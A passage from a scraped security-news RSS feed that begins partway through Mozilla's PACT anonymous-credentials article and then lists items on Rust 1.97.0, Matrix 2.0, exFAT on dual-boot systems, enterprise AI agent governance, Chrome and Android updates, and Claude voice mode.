<p class="c10"><strong><span class="c20 c1">Figure 3</span></strong><span class="c1">: <em>In the course of normal browsing, clients browse to websites they have a relationship with. These sites can act as Anchors by issuing Endorsements to clients.</em></span></p>
<p class="c26"><span class="c0">Second, when the user arrives at a site that works with a Moderator, the browser spends an Endorsement from an Anchor the Moderator trusts and receives a Credential in return. The presentation hides </span><span class="c13 c11 c1">which </span><span class="c0">Anchor was used, and </span><span class="c1">neither the Anchor nor the Moderator can trace the Endorsement back to where it was issued</span><span class="c0">. The Moderator decides what initial balance the Credential starts with. If the user has no Endorsements from suitable Anchors at all, existing mechanisms (CAPTCHAs, account creation, federated login) </span><span class="c1">could be used to</span><span class="c0"> bootstrap a Credential the same way, so the system degrades to today’s experience rather than locking the user out.</span></p>
<p class="c7"><img alt="" title=""><img alt="A diagram showing the protocol flow between Anchors and Moderators" class="aligncenter size-full wp-image-48378" height="1789" src="https://hacks.mozilla.org/wp-content/uploads/2026/06/pact-drawings-4.excalidraw1-scaled.png" width="2560"></p>
<p class="c7"><span class="c20 c1"><strong>Figure 4</strong></span><span class="c1"><strong>:</strong><em> When the client browses to a site, it can prompt the client for a Credential from the Moderator it uses. If the Client doesn’t have a suitable Credential, but does have a suitable Endorsement, it can exchange it for a Credential with the Moderator. In practice, the Moderator and the Site might be the same server. </em></span><em><span class="c0"> </span></em></p>
<p class="c25"><span class="c0">Third, as the user browses, the browser presents the Credential and the Moderator updates </span><span class="c1">the internal state of the Credential</span><span class="c0">. The </span><span class="c1">Moderator can reward </span><span class="c0">behaviour that looks benign and </span><span class="c1">penalize suspicious activity</span><span class="c0">, </span><span class="c1">but can’t track the use of the Credential or identify it if it’s used on other sites the Moderator covers</span><span class="c0">. </span><span class="c0">Revocation falls out of the same mechanism: a Moderator </span><span class="c1">can refuse to return an updated Credential</span><span class="c0">.</span><span class="c0"> </span></p>
<p class="c7"><img alt="" title=""><img alt="A diagram showing the PACT Moderator Flow" class="aligncenter size-full wp-image-48379" height="1618" src="https://hacks.mozilla.org/wp-content/uploads/2026/06/pact-drawings-5.excalidraw1-scaled.png" width="2560"></p>
<p class="c7"><strong><span class="c20 c1">Figure 5</span></strong><span class="c0"><strong>:</strong> <em>The Client can present the Credential on sites which use the matching Moderator. Sites can check if the Credential is in good standing. The sites can then adjust the access the Credential has in response to behaviour. E.g. increasing it when they gain confidence in the client or reducing it in response to malicious behaviour.</em></span></p>
<p class="c23"><span class="c0">In practice, all of this would happen transparently to the user through a WebAPI that sites acting as Anchors or Moderators would call from JavaScript. In an ideal ecosystem, users would accumulate Endorsements through normal browsing, just by virtue of the sites they already visit, and the rest of the flow would happen in the background as they move around the web, leaving </span><span class="c1">users</span><span class="c0"> with meaningfully less friction. </span></p>
<p class="c16"><span class="c0">AI agents acting on behalf of a user slot into the same flow. An agent can carry its user’s Credentials, in which case the user remains accountable for how the agent </span><span class="c1">behaves.</span><span class="c0"> </span><span class="c1">S</span><span class="c0">ites would not need to grant any more access than they would to the user themselves. Alternatively, the operator of an agent can run its own Anchor and vouch for its agents the way other Anchors vouch for human users. </span><span class="c0">Sites retain control over which Anchors they accept, so they can choose how to treat agent traffic without needing a separate detection mechanism. </span></p>
<p class="c6"><span class="c0">Several mechanisms combine to keep the information about a user that flows out close to a single bit. Cryptographic unlinkability ensures successive Credential presentations cannot be tied to each other or to the original issuance, so a user’s visits cannot be </span><span class="c1">joined</span><span class="c0"> into a history. Each site is bound to a single Moderator, so the set of Moderators a user has Credentials with never becomes a cross-site fingerprint. The Anchor-to-Credential exchange happens in an isolated browsing context, so during ordinary browsing the only thing the site or its Moderator ever observes is a Credential presentation: </span><span class="c1">the site only learns if </span><span class="c0">the user has a valid Credential below the rate limit, or </span><span class="c1">nothing</span><span class="c0">. </span><span class="c1">W</span><span class="c0">hen the Moderator updates a </span><span class="c1">Credential</span><span class="c0">, it</span><span class="c0"> adjusts the credentials state without learning what it is.</span></p>
<p class="c6"><span class="c1">The additional privacy given to users from </span><span class="c0">Issuer blinding</span><span class="c1"> makes participating in the system more challenging for Moderators</span><span class="c0">. Because the Moderator can’t see which Anchor backed a Credential at issuance, it can’t give a Credential from a strong Anchor </span><span class="c1">more access</span><span class="c0"> than one from a weak Anchor: doing so would itself leak which Anchor was used. The initial </span><span class="c1">access</span><span class="c0"> has to be uniform across the Moderator’s whole pool of Anchors, which in practice means setting it at the strength of the weakest. </span><span class="c1">However, this is only relevant for that initial access, the Moderator can update credentials according to the holder’s behavior, enabling Credential’s to accrue access over time.</span></p>
<p class="c42"><span class="c0">Building an open ecosystem also requires that sites can make effective decisions about the Anchors they choose to trust</span><span class="c1">. M</span><span class="c0">ultiparty computation systems like </span><span class="c0">Prio</span><span class="c0"> enable aggregate scoring without compromising pr</span><span class="c1">ivacy</span><span class="c0">. When users present Credentials, they can provide an encrypted share which identifies the anchor they use</span><span class="c1">d and can be privately aggregated to compute the quality of an issuer.</span></p>
<h3 class="c24"><span class="c2 c1">Next Steps </span></h3>
<p class="c49"><span class="c1">We think the</span><span class="c0"> architecture we</span><span class="c1">’ve </span><span class="c0">sketched </span><span class="c1">for PACT </span><span class="c0">has the right shape, but many of the details still need to be worked out</span><span class="c1"> and the entire system needs rigorous privacy and security analysis.</span></p>
<p class="c45"><span class="c0">We want to do that work in the open. The IETF is the natural venue for the cryptographic protocols underneath, and the W3C for the WebAPI surface that sits on top. </span><span class="c0">We’ll be </span><span class="c1">bringing</span><span class="c0"> </span><span class="c3 c1"><a class="c5" href="https://github.com/Moderation-of-unLinkable-Endorsements">draft specifications</a></span><span class="c1"> to these bodies as soon as they’re ready</span><span class="c0">, and we welcome collaborators from across the ecosystem: browser vendors, site operators, anti-abuse providers, and the cryptography community. </span></p>
<p class="c29"><span class="c0">If successful, we think we can provide a system which will keep the web open and </span><span class="c1">private</span><span class="c0">, while still giving sites the rate-limiting signal they need. </span></p>
<h3 class="c29"><span class="c2 c1">Acknowledgements</span></h3>
<p class="c4"><em><span class="c11 c1">The ideas described here are the result of collaboration and conversations with many people, including: Watson Ladd, Thibault Meunier, Michele Orrù, Trevor Perrin, Eric Rescorla, Samuel Schlesinger, Martin Thomson, Eric Trouton, Benjamin Vandersloot &amp; Cathie Yun.</span></em><span class="c11 c1"><em> </em> </span></p>
<hr class="c58">
<div>
<p class="c31"><a href="https://hacks.mozilla.org/?p=48374#:~:text=%5B1%5D">[1]</a><span class="c0"> PAT requires that the source of scarcity and an independent issuer be trusted not to collude. If they do, they can track users as they interact with the system. This is not suitable in the context of an open system where any party could play those two roles.</span></p>
</div>
<p>The post <a href="https://hacks.mozilla.org/2026/06/pact-anonymous-credentials-for-the-web/">PACT: Anonymous Credentials for the Web</a> appeared first on <a href="https://hacks.mozilla.org/">Mozilla Hacks - the Web developer blog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The Rust Programming Language Blog: Announcing Rust 1.97.0]]></title>
<description><![CDATA[The Rust team is happy to announce a new version of Rust, 1.97.0. Rust is a programming language empowering everyone to build reliable and efficient software.
If you have a previous version of Rust installed via rustup, you can get 1.97.0 with:
$ rustup update stable
If you don't have it already,...]]></description>
<link>https://tsecurity.de/de/3693286/tools/the-rust-programming-language-blog-announcing-rust-1970/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693286/tools/the-rust-programming-language-blog-announcing-rust-1970/</guid>
<pubDate>Sat, 25 Jul 2026 08:37:20 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The Rust team is happy to announce a new version of Rust, 1.97.0. Rust is a programming language empowering everyone to build reliable and efficient software.</p>
<p>If you have a previous version of Rust installed via <code>rustup</code>, you can get 1.97.0 with:</p>
<pre class="giallo z-code"><code><span class="giallo-l"><span>$</span><span> rustup update stable</span></span></code></pre>
<p>If you don't have it already, you can get <a href="https://www.rust-lang.org/install.html" rel="external"><code>rustup</code></a> from the appropriate page on our website, and check out the <a href="https://doc.rust-lang.org/stable/releases.html#version-1970-2026-07-09" rel="external">detailed release notes for 1.97.0</a>.</p>
<p>If you'd like to help us out by testing future releases, you might consider updating locally to use the beta channel (<code>rustup default beta</code>) or the nightly channel (<code>rustup default nightly</code>). Please <a href="https://github.com/rust-lang/rust/issues/new/choose" rel="external">report</a> any bugs you might come across!</p>
<h3><a class="anchor" href="https://blog.rust-lang.org/2026/07/09/Rust-1.97.0/#what-s-in-1-97-0-stable"></a>
What's in 1.97.0 stable</h3>
<h4><a class="anchor" href="https://blog.rust-lang.org/2026/07/09/Rust-1.97.0/#symbol-mangling-v0-enabled-by-default"></a>
Symbol mangling v0 enabled by default</h4>
<p>When Rust is compiled into object files and binaries, each item (functions,
statics, etc) must have a globally unique "symbol" identifying it. To avoid
conflicts when linking together different Rust programs, Rust mangles the
original name of items to include additional context such as the module path,
defining crate, generics, and more. Historically, this mangling was based on
the <a href="https://refspecs.linuxbase.org/cxxabi-1.86.html#mangling" rel="external">Itanium ABI</a>,
also (sometimes) used by C++.</p>
<p>The new mangling scheme resolves a number of drawbacks from the previous one:</p>
<ul>
<li>Generic parameter instantiations preserve their values, rather than being tracked solely behind a hash</li>
<li>Inconsistencies: not all parts used the Itanium ABI, meaning that custom demangling was still necessary</li>
</ul>
<p>Since Rust 1.59, the compiler has supported opting into a Rust-specific
mangling scheme via <code>-Csymbol-mangling-version=v0</code>. Since November 2025, this
scheme has been enabled by default on nightly, and 1.97 is now enabling it on
stable Rust. The legacy mangling scheme can only be enabled on nightly, and the
current plan is to fully remove it.</p>
<p>See the previous <a href="https://blog.rust-lang.org/2025/11/20/switching-to-v0-mangling-on-nightly/" rel="external">blog post</a> for more details.</p>
<h4><a class="anchor" href="https://blog.rust-lang.org/2026/07/09/Rust-1.97.0/#cargo-support-for-denying-warnings"></a>
Cargo support for denying warnings</h4>
<p>It's common practice to deny warnings in CI. Historically, doing so is
typically done through <code>RUSTFLAGS=-Dwarnings</code>. With Rust 1.97, Cargo controls
how warnings interact with build success: either silencing them (via <code>allow</code>
level), rendering without failing (default, <code>warn</code>), or denying them (via <code>deny</code>).</p>
<p>As a  result of Cargo configuration determining the behavior, using this
feature doesn't invalidate the underlying build cache, meaning that it's easy
to temporarily opt-in. For example, if warnings are adding unwanted noise while
working through fixing errors after a refactor, you can run
<code>CARGO_BUILD_WARNINGS=allow cargo check</code>, temporarily silencing them.</p>
<p>In CI, jobs can instead set <code>CARGO_BUILD_WARNINGS=deny</code> to deny warnings. This
can be combined with <code>--keep-going</code> to collect all errors and warnings rather
than stopping on the first failing package.</p>
<p>See the <a href="https://doc.rust-lang.org/cargo/reference/config.html#buildwarnings" rel="external">documentation</a> for more details.</p>
<h4><a class="anchor" href="https://blog.rust-lang.org/2026/07/09/Rust-1.97.0/#linker-output-no-longer-hidden-by-default"></a>
Linker output no longer hidden by default</h4>
<p>rustc invokes a linker on behalf of users. Historically, rustc has silenced
linker output by default if the link completes successfully. This can mask real
problems, though, so in Rust 1.97 we are enabling linker messages by default.
These are emitted as a warning lint, for example:</p>
<pre class="giallo z-code"><code><span class="giallo-l"><span>warning: linker stderr: ignoring deprecated linker optimization setting '1'</span></span>
<span class="giallo-l"><span>  |</span></span>
<span class="giallo-l"><span>  = note: `#[warn(linker_messages)]` on by default</span></span></code></pre>
<p>Common linker messages that have been diagnosed as false positives or intentional behavior
are filtered out by rustc. Several defects have already been fixed as a result
of no longer hiding this output on nightly.</p>
<p>Note that currently, <code>linker_messages</code> is a special lint that is <em>not</em> affected
by the <code>warnings</code> lint group. This is intentional as rustc generally doesn't
control linker output as precisely, and it's not uncommon for output to only
appear on some platforms. If you are seeing what you think is a false positive
output from the linker, please <a href="https://github.com/rust-lang/rust/issues/new/choose" rel="external">file an issue</a>.</p>
<p>To silence the warning in the mean time, you can configure the lint level to
allow. This can be done through <code>Cargo.toml</code> by adding a <a href="https://doc.rust-lang.org/nightly/cargo/reference/manifest.html#the-lints-section" rel="external">lints section</a> like this:</p>
<pre class="giallo z-code"><code><span class="giallo-l"><span>[</span><span>lints</span><span>.</span><span>rust</span><span>]</span></span>
<span class="giallo-l"><span class="z-variable">linker_messages</span><span> =</span><span class="z-punctuation z-definition z-string z-string"> "</span><span class="z-string z-quoted z-string">allow</span><span class="z-punctuation z-definition z-string z-string">"</span></span></code></pre><h4><a class="anchor" href="https://blog.rust-lang.org/2026/07/09/Rust-1.97.0/#stabilized-apis"></a>
Stabilized APIs</h4>
<ul>
<li><a href="https://doc.rust-lang.org/stable/std/iter/struct.RepeatN.html#impl-Default-for-RepeatN%3CA%3E" rel="external"><code>Default for RepeatN</code></a></li>
<li><a href="https://doc.rust-lang.org/stable/std/ffi/struct.FromBytesUntilNulError.html#impl-Copy-for-FromBytesUntilNulError" rel="external"><code>Copy for ffi::FromBytesUntilNulError</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/154003" rel="external"><code>Send for std::fs::File</code> on UEFI</a></li>
<li><a href="https://doc.rust-lang.org/stable/std/primitive.u32.html#method.isolate_highest_one" rel="external"><code>&lt;{integer}&gt;::isolate_highest_one</code></a></li>
<li><a href="https://doc.rust-lang.org/stable/std/primitive.u32.html#method.isolate_lowest_one" rel="external"><code>&lt;{integer}&gt;::isolate_lowest_one</code></a></li>
<li><a href="https://doc.rust-lang.org/stable/std/primitive.u32.html#method.highest_one" rel="external"><code>&lt;{integer}&gt;::highest_one</code></a></li>
<li><a href="https://doc.rust-lang.org/stable/std/primitive.u32.html#method.lowest_one" rel="external"><code>&lt;{integer}&gt;::lowest_one</code></a></li>
<li><a href="https://doc.rust-lang.org/stable/std/primitive.u32.html#method.bit_width" rel="external"><code>&lt;{uN}&gt;::bit_width</code></a></li>
<li><a href="https://doc.rust-lang.org/stable/std/num/struct.NonZero.html#method.isolate_highest_one" rel="external"><code>NonZero&lt;{integer}&gt;::isolate_highest_one</code></a></li>
<li><a href="https://doc.rust-lang.org/stable/std/num/struct.NonZero.html#method.isolate_lowest_one" rel="external"><code>NonZero&lt;{integer}&gt;::isolate_lowest_one</code></a></li>
<li><a href="https://doc.rust-lang.org/stable/std/num/struct.NonZero.html#method.highest_one" rel="external"><code>NonZero&lt;{integer}&gt;::highest_one</code></a></li>
<li><a href="https://doc.rust-lang.org/stable/std/num/struct.NonZero.html#method.lowest_one" rel="external"><code>NonZero&lt;{integer}&gt;::lowest_one</code></a></li>
<li><a href="https://doc.rust-lang.org/stable/std/num/struct.NonZero.html#method.bit_width" rel="external"><code>NonZero&lt;{uN}&gt;::bit_width</code></a></li>
</ul>
<p>These previously stable APIs are now stable in const contexts:</p>
<ul>
<li><a href="https://doc.rust-lang.org/stable/std/primitive.char.html#method.is_control" rel="external"><code>char::is_control</code></a></li>
</ul>
<h4><a class="anchor" href="https://blog.rust-lang.org/2026/07/09/Rust-1.97.0/#other-changes"></a>
Other changes</h4>
<p>Check out everything that changed in <a href="https://github.com/rust-lang/rust/releases/tag/1.97.0" rel="external">Rust</a>, <a href="https://doc.rust-lang.org/nightly/cargo/CHANGELOG.html#cargo-197-2026-07-09" rel="external">Cargo</a>, and <a href="https://github.com/rust-lang/rust-clippy/blob/master/CHANGELOG.md#rust-197" rel="external">Clippy</a>.</p>
<h3><a class="anchor" href="https://blog.rust-lang.org/2026/07/09/Rust-1.97.0/#contributors-to-1-97-0"></a>
Contributors to 1.97.0</h3>
<p>Many people came together to create Rust 1.97.0. We couldn't have done it without all of you. <a href="https://thanks.rust-lang.org/rust/1.97.0/" rel="external">Thanks!</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Matrix 2.0 — How we're making Matrix go voom!]]></title>
<description><![CDATA[Author: Matrixdotorg - Bewertung: 395x - Views:15995 NOTE: we'll update the FOSDEM 2023 playlist as we gather all the talks. Stay tuned for more Matrix content.

This video was recorded during FOSDEM 2023, and can also be found here: https://fosdem.org/2023/schedule/event/matrix20/

Matrix is an ...]]></description>
<link>https://tsecurity.de/de/3693271/videos/matrix-20-how-were-making-matrix-go-voom/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693271/videos/matrix-20-how-were-making-matrix-go-voom/</guid>
<pubDate>Sat, 25 Jul 2026 08:36:49 +0200</pubDate>
<category>🎥 Videos</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Matrixdotorg - Bewertung: 395x - Views:15995 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/eUPJ9zFV5IE?autoplay=1&origin=https://tsecurity.de" frameborder="0"></iframe></p><p>NOTE: we&#039;ll update the FOSDEM 2023 playlist as we gather all the talks. Stay tuned for more Matrix content.<br />
<br />
This video was recorded during FOSDEM 2023, and can also be found here: https://fosdem.org/2023/schedule/event/matrix20/<br />
<br />
Matrix is an open standard for secure, decentralised communication, which may be familiar from powering the online editions of FOSDEM in 2021 and 2022 (and hybrid-FOSDEM this year!).<br />
<br />
In this talk we will explain the fundamental changes which are landing in Matrix 2.0, which speeds up Matrix to be at least as snappy as the fastest proprietary messaging apps - all while handling thousands of rooms spanning millions of users.<br />
<br />
During 2022 we&#039;ve been on a mission to completely rework the slowest bits of Matrix, aiming that nobody can ever complain about Matrix being sluggish again. In practice this means fundamental changes in:<br />
<br />
- How Matrix syncs data - &quot;sliding sync&quot;, where servers only sync the bare minimum data to clients required to render the UI, providing instant login and instant sync (MSC3575)<br />
<br />
- How room joins work over federation - &quot;faster joins&quot;, where servers only sync the bare minimum data such that clients can start participating in the room as soon as possible (MSC3902)<br />
<br />
- How auth works - switching Matrix to use OIDC natively for all authentication, registration and account management (MSC3861)<br />
<br />
- How VoIP works - switching Matrix to natively support multiparty decentralised E2EE VoIP as the primary calling mechanism (MSC3401 and MSC3898)<br />
<br />
The end result is transformational, and by far the biggest change to Matrix since the project began in 2014. So, we&#039;re calling it Matrix 2.0, and this talk will give a guided tour of everything that&#039;s changed - and show off the new reference matrix-rust-sdk client SDK, which powers the new flagship mobile Matrix client, codenamed Element X.<br />
<br />
00:00 Hello!<br />
00:41 Matrix and its ecosystem<br />
06:33 Spec update<br />
08:10 Matrix is taking over the world<br />
09:26 Demo: Element X is blazing fast<br />
13:25 Behind the scenes of the demo<br />
15:02 How sliding sync works<br />
21:20 One matrix-rust-sdk to rule them all<br />
23:45 Faster remote room joins<br />
25:12 MatrixRTC, Element Call, Matryoshka Widgets<br />
26:37 Demo: Element Call!<br />
28:34 Demo: raiding Element Call with waterfall — Selective Forwarding Units for Matrix<br />
31:02 OpenID Connect: authentication done right<br />
32:04 The future: Digital Markets Act, MIMI, MLS, P2P Matrix<br />
36:32 Demo: P2P Matrix<br />
40:31 Demo: ThirdRoom — Matrix beyond chat and voice<br />
47:16 What&#039;s next?<br />
<br />
Support Matrix!<br />
🪙 Donorbox for individuals - https://donorbox.org/keep-matrix-exciting<br />
💶 Matrix Foundation (paid) membership for orgs - https://forms.gle/Yy345QkB5pifJJNy6<br />
<br />
(This Week in) Matrix<br />
🐘 https://mastodon.matrix.org/@matrix<br />
🐦️ https://twitter.com/matrixdotorg<br />
[m] https://matrix.to/#/#thisweekinmatrix:matrix.org<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Is exFAT feasible for internal ssd long term ?]]></title>
<description><![CDATA[Dual booting win/linux for a while now (dedicated ssd per OS). And I need some shared storage so I've been using ntfs for 2 storage ssd's but it's been a huge headache as the linux/win combination constantly corrupts the ntfs file system and I end up with a ton of issues on linux, always having t...]]></description>
<link>https://tsecurity.de/de/3692666/linux-tipps/is-exfat-feasible-for-internal-ssd-long-term/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692666/linux-tipps/is-exfat-feasible-for-internal-ssd-long-term/</guid>
<pubDate>Sat, 25 Jul 2026 00:11:38 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Dual booting win/linux for a while now (dedicated ssd per OS). And I need some shared storage so I've been using ntfs for 2 storage ssd's but it's been a huge headache as the linux/win combination constantly corrupts the ntfs file system and I end up with a ton of issues on linux, always having to repair it in windows. </p> <p>I already do full shutdowns on windows (even started disconnecting the drives from the windows partition manager before shutdown), it doesn't seem to help (i'm suspecting that linux itself corrupts the file system sometimes). </p> <p>So I'm thinking of switching to using exfat but I've not been able to find much on how feasible that is to use on internal drives. Anyone have any experience with this ? </p> <p>Of note - the data is not that critical as to warrant a high degree of reliability, but at the same time if exfat presents known issues, same or worse as ntfs, it doesn't make sense to switch.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/kepler2"> /u/kepler2 </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1v5dpw3/is_exfat_feasible_for_internal_ssd_long_term/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1v5dpw3/is_exfat_feasible_for_internal_ssd_long_term/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[VentureBeat Research: Where enterprise AI agent governance hasn't caught up]]></title>
<description><![CDATA[Enterprises deployed AI agents ahead of the controls needed to manage them — and they did it knowingly. That is the central finding across the five parallel surveys VentureBeat Research fielded in June, spanning every layer of the agentic stack. Now those enterprises are retrofitting to catch up ...]]></description>
<link>https://tsecurity.de/de/3692498/it-nachrichten/venturebeat-research-where-enterprise-ai-agent-governance-hasnt-caught-up/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692498/it-nachrichten/venturebeat-research-where-enterprise-ai-agent-governance-hasnt-caught-up/</guid>
<pubDate>Fri, 24 Jul 2026 22:51:31 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Enterprises deployed AI agents ahead of the controls needed to manage them — and they did it knowingly. That is the central finding across the five parallel surveys VentureBeat Research fielded in June, spanning every layer of the agentic stack. Now those enterprises are retrofitting to catch up with their own standards, and they are budgeting for it: In each of the five control layers we measured, 57 to 68% of enterprises plan to switch vendors or add new ones within 12 months, and roughly a third, depending on the layer, plan to move within the quarter.</p><p><a href="https://venturebeat.com/category/resources">VentureBeat Research</a> measured the five controls an enterprise has to build before it can trust an agent: identity, evaluation, cost telemetry, the context layer, and orchestration. Identity governs which agent is allowed to do what, under whose credentials. Evaluation determines whether the agent's work is any good. Cost telemetry tracks what each agent costs to run. The context layer supplies the business data and definitions agents draw on when they answer. And the orchestration control plane coordinates multi-step agent work. Each of our five reports measures one of those controls.</p><p><b>Most deployed "agents" are chatbots wearing the label.</b> Seventy-one percent of enterprises said a quarter or fewer of their deployed "agents" can complete multi-step work on their own; only 10% said true agents are the majority of what they run. These respondents are positioned to know: 81% recommend or decide AI purchases at their companies. A single-prompt chatbot with a human reading every answer needs none of the controls the other four reports measure. A true multi-step agent needs all of them — and most enterprises can't say which one they've deployed. <i>(Full findings: </i><a href="https://venturebeat.com/resources/agentic-orchestration-enterprise-ai-organizations-have-a-deployment-problem-not-a-platform-problem-and-most-are-calling-chatbots-agents"><i>Agentic Orchestration report.</i></a><i>)</i></p><p><b>Autonomy is outrunning trust in the evaluations that gate it.</b> Two-thirds of enterprises either already allow an agent to push a code or system change to production on automated evaluation results alone, with no human review, or are actively engineering toward that within 12 months. Only 5% fully trust the evaluations that would make that call — and half of enterprises shipped an agent that passed internal evaluations and then caused a customer-facing failure in the past year. Before removing human review from any workflow, test evaluations against production outcomes rather than internal benchmarks. <i>(Full findings: </i><a href="https://venturebeat.com/resources/the-agent-evaluation-gap-enterprise-ai-organizations-have-a-reality-alignment-problem-not-a-coverage-problem-and-most-are-shipping-to-production-anyway"><i>Agent Reliability &amp; Evals report</i></a><i>.)</i></p><p><b>Companies that let agents share credentials get hit more often.</b> Sixty-nine percent of companies let at least some of their agents share credentials — multiple agents operating under one API key or service account. Organizations that allow credential sharing anywhere experienced a security incident or near-miss at a 63.5% rate (47 of 74), against 40.9% (nine of 22) at companies where every agent has its own scoped identity. The fix is scoped identity for every agent, starting with the ones that touch production systems. <i>(Full findings: </i><a href="https://venturebeat.com/resources/the-agent-security-gap-54-of-enterprises-have-already-had-an-ai-agent-incident-and-most-still-let-agents-share-credentials"><i>Agentic Security &amp; Identity report</i></a><i>.)</i></p><p><b>The most expensive hardware in the building runs at half capacity or less.</b> More than eight in 10 enterprises that run their own GPUs reported utilization of 50% or less, and only 44% rigorously track what their AI compute actually costs and returns. The number worth chasing first isn't more GPUs — it's the utilization and per-workload cost of the ones already running. <i>(Full findings: </i><a href="https://venturebeat.com/resources/the-ai-compute-gap-enterprises-are-buying-infrastructure-faster-than-they-can-measure-what-it-costs"><i>AI Infrastructure &amp; Compute report</i></a><i>.)</i></p><p><b>Agents answer confidently from data nobody governs.</b> Fifty-seven percent of enterprises traced a confident, wrong agent answer in the past six months to their own missing or inconsistent business context — wrong metrics, stale definitions, absent documents — and most saw it happen more than once. Governing the definitions agents answer from — metrics and entities first — has to come before scaling the agents that depend on them. <i>(Full findings: </i><a href="https://venturebeat.com/resources/the-ai-context-gap-enterprise-ai-organizations-have-a-trust-problem-not-a-retrieval-problem-and-most-are-still-building-the-fix"><i>Context Layers / RAG report</i></a><i>.)</i></p><p>No layer has an entrenched incumbent: The defaults today are the built-in tools that ship with the big AI platforms enterprises already use. Switching intent runs highest in orchestration itself, where 68% plan to adopt, add, or replace platforms within 12 months and 34% within the quarter. Our surveys did not ask which direction that money moves — toward the platforms' built-in tools or toward the specialists challenging them — and that open question is the next four quarters of this market.</p><hr><p><b>About this research</b> </p><p><a href="https://venturebeat.com/category/resources">VentureBeat Research</a> fielded five parallel surveys in June 2026 under its VB Pulse program: Agentic Orchestration (101 respondents), Agent Reliability &amp; Evals (157), Agentic Security &amp; Identity (107), AI Infrastructure &amp; Compute (107), and Context Layers / RAG (101) — 573 qualified respondents in total, all at organizations with 100 or more employees. Samples are self-selected, and some findings should be read directionally; each report carries its full methodology note. What the pattern supports more strongly than any single percentage is the direction: every survey, independently, points the same way. VentureBeat produces both this research and <a href="https://venturebeat.com/vbtransform2026">VB Transform</a>, the conference where these reports debuted.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Chrome Dev for Desktop Update]]></title>
<description><![CDATA[The Dev channel has been updated to 152.0.7967.2 for Windows, Mac and Linux.A partial list of changes is available in the Git log. Interested in switching release channels? Find out how. If you find a new issue, please let us know by filing a bug. The community help forum is also a great place to...]]></description>
<link>https://tsecurity.de/de/3692188/it-security-nachrichten/chrome-dev-for-desktop-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692188/it-security-nachrichten/chrome-dev-for-desktop-update/</guid>
<pubDate>Fri, 24 Jul 2026 19:25:04 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The Dev channel has been updated to 152.0.7967.2 for Windows, Mac and Linux.</p><p>A partial list of changes is available in the <a href="https://chromium.googlesource.com/chromium/src/+log/152.0.7953.3..152.0.7967.2?pretty=fuller&amp;n=10000">Git log</a>. Interested in <a href="https://www.chromium.org/getting-involved/dev-channel/">switching</a> release channels? Find out <a href="https://www.chromium.org/getting-involved/dev-channel/">how</a>. If you find a new issue, please let us know by <a href="https://crbug.com/">filing a bug</a>. The <a href="https://productforums.google.com/forum/#!forum/chrome">community help forum</a> is also a great place to reach out for help or learn about common issues.</p><p>Chrome Release Team<br><a href="https://www.google.com/chrome"></a><a href="https://www.google.com/chrome">Google Chrome</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google Brings iPhone-to-Android Switching Directly Into Android 17]]></title>
<description><![CDATA[Android 17 adds a built-in iPhone switching tool that can transfer more data, including passwords, Wi-Fi credentials, and eSIMs, on select devices.
The post Google Brings iPhone-to-Android Switching Directly Into Android 17 appeared first on TechRepublic.]]></description>
<link>https://tsecurity.de/de/3691826/it-nachrichten/google-brings-iphone-to-android-switching-directly-into-android-17/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691826/it-nachrichten/google-brings-iphone-to-android-switching-directly-into-android-17/</guid>
<pubDate>Fri, 24 Jul 2026 16:46:20 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Android 17 adds a built-in iPhone switching tool that can transfer more data, including passwords, Wi-Fi credentials, and eSIMs, on select devices.</p>
<p>The post <a href="https://www.techrepublic.com/article/news-android-17-iphone-switching-tool/">Google Brings iPhone-to-Android Switching Directly Into Android 17</a> appeared first on <a href="https://www.techrepublic.com/">TechRepublic</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Meet the Galaxy Z Fold 8, Samsung's First Book-Style Foldable]]></title>
<description><![CDATA[The brand says its all-new form factor makes switching from the cover screen to the primary display more intuitive.]]></description>
<link>https://tsecurity.de/de/3691567/it-nachrichten/meet-the-galaxy-z-fold-8-samsungs-first-book-style-foldable/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691567/it-nachrichten/meet-the-galaxy-z-fold-8-samsungs-first-book-style-foldable/</guid>
<pubDate>Fri, 24 Jul 2026 14:52:44 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The brand says its all-new form factor makes switching from the cover screen to the primary display more intuitive.]]></content:encoded>
</item>
<item>
<title><![CDATA[Anthropic Upgrades Claude Voice Mode With Opus and Sonnet Support]]></title>
<description><![CDATA[Claude voice mode now supports Anthropic’s Opus and Sonnet models, giving users access to stronger reasoning and more capable responses during spoken conversations. Until now, voice mode only worked with the faster Haiku model, which focused more on speed than deeper analysis.







The upgrade ...]]></description>
